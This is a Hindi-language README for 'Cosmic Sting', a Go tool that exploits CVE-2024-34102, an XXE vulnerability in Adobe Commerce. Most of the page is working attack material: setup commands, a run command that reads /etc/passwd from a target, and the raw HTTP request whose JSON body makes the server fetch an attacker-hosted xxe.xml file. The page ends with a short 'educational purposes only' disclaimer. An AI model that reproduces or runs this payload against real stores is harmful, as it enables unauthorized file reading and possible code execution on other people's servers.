
शोषण CVE-2024-34102
Cosmic Sting एक Go-आधारित टूल है जिसे CVE-2024-34102, रिमोट कोड एक्ज़ीक्यूशन (Remote Code Execution) भेद्यता का फायदा उठाने के लिए डिज़ाइन किया गया है।
Adobe Commerce के संस्करण 2.4.7, 2.4.6-p5, 2.4.5-p7, 2.4.4-p8 और उससे पहले के संस्करण XML एक्सटर्नल एंटिटी रेफरेंस ('XXE') के अनुचित प्रतिबंध से प्रभावित हैं, जिसके परिणामस्वरूप मनमाना कोड निष्पादन हो सकता है। कोई हमलावर बाहरी एंटिटीज़ का संदर्भ देने वाला एक क्राफ्टेड XML दस्तावेज़ भेजकर इस भेद्यता का फायदा उठा सकता है। इस समस्या के शोषण के लिए उपयोगकर्ता की सहभागिता की आवश्यकता नहीं होती है।
रिपॉजिटरी क्लोन करें:
git clone https://github.com/bughuntar/CVE-2024-34102.git &&
cd CVE-2024-34102
निर्भरताएँ स्थापित करें (यदि कोई हों):
go version &&
go mod init cosmic_sting &&
go get github.com/fatih/color &&
go get github.com/google/uuid &&
go get github.com/urfave/cli/v2
एकल URL के साथ टूल चलाने के लिए:
go run cosmic_sting.go -u "http://example.com" -f "/etc/passwd"
-u, --url : एक्सप्लॉइट करने के लिए एकल URL।-f, --file : SSRF के माध्यम से पढ़ने के लिए फ़ाइल।-l, --list : एक्सप्लॉइट करने के लिए URL की सूची वाली फ़ाइल।POST /rest/V1/guest-carts/1/estimate-shipping-methods HTTP/1.1
Host: {{hostname}}
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Connection: close
Content-Type: application/json
Content-Length: 187
{"address":{"totalsCollector":{"collectorList":{"totalCollector":{"sourceData":{"data":"https://{{hostedXMLfile.com}}/xxe.xml","dataIsURL":true,"options":1234}}}}}}
यह प्रोजेक्ट लाइसेंस प्राप्त नहीं है, यह केवल व्यक्तिगत प्रोजेक्ट के लिए बनाया गया है।
योगदान का स्वागत है! किसी भी बदलाव के लिए कृपया एक issue खोलें या pull request सबमिट करें।
यह टूल केवल शैक्षिक उद्देश्यों के लिए है। इसका उपयोग जिम्मेदारी से और केवल उन सिस्टमों पर करें जिनका परीक्षण करने की आपके पास अनुमति है।
Professor the Hunter --> मुझे Twitter पर फ़ॉलो करें